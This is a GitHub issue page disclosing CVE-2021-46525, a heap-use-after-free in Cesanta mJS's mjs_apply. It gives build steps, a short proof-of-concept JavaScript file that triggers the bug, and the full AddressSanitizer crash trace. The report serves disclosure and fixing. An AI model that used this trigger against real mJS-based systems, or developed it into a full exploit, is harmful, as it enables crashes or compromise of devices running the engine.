Headline

CVE-2021-46525: Heap-use-after-free src/mjs_exec.c:1156 in mjs_apply · Issue #199 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a heap-use-after-free via mjs_apply at src/mjs_exec.c.

2 years ago

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

Comments

@hope-fly

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

save the makefile then make

make

Test casepoc.js

function T(f) {}
function JSEtest(b) {
  T.apply.apply(T.apply, []);

  if (b < 10)
    JSEtest(T.apply, []);
}
JSEtest(0);

Execution steps & Output

$ ./mjs/build/mjs poc.js

======ERROR: AddressSanitizer: heap-use-after-free on address 0x6040000000f8 at pc 0x5590f9ee05d6 bp 0x7fff0f0dc5b0 sp 0x7fff0f0dc5a0 READ of size 8 at 0x6040000000f8 thread T0 #0 0x5590f9ee05d5 in mjs_apply src/mjs_exec.c:1156 #1 0x5590f9ee08d4 in mjs_apply_ src/mjs_exec.c:515 #2 0x5590f9ed4244 in mjs_execute src/mjs_exec.c:853 #3 0x5590f9edda05 in mjs_exec_internal src/mjs_exec.c:1073 #4 0x5590f9edda05 in mjs_exec_file src/mjs_exec.c:1096 #5 0x5590f9e9a909 in main src/mjs_main.c:47 #6 0x7f009363db96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x5590f9e9b449 in _start (/usr/local/bin/Gmjs+0xe449)

0x6040000000f8 is located 40 bytes inside of 48-byte region [0x6040000000d0,0x604000000100) freed by thread T0 here: #0 0x7f0093ceff30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x5590f9facdf8 in mbuf_insert src/common/mbuf.c:90

previously allocated by thread T0 here: #0 0x7f0093ceff30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x5590f9facdf8 in mbuf_insert src/common/mbuf.c:90

SUMMARY: AddressSanitizer: heap-use-after-free src/mjs_exec.c:1156 in mjs_apply Shadow bytes around the buggy address: 0x0c087fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff8000: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00 =>0x0c087fff8010: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd[fd] 0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb

Credits: Found by OWL337 team.

1 participant

@hope-fly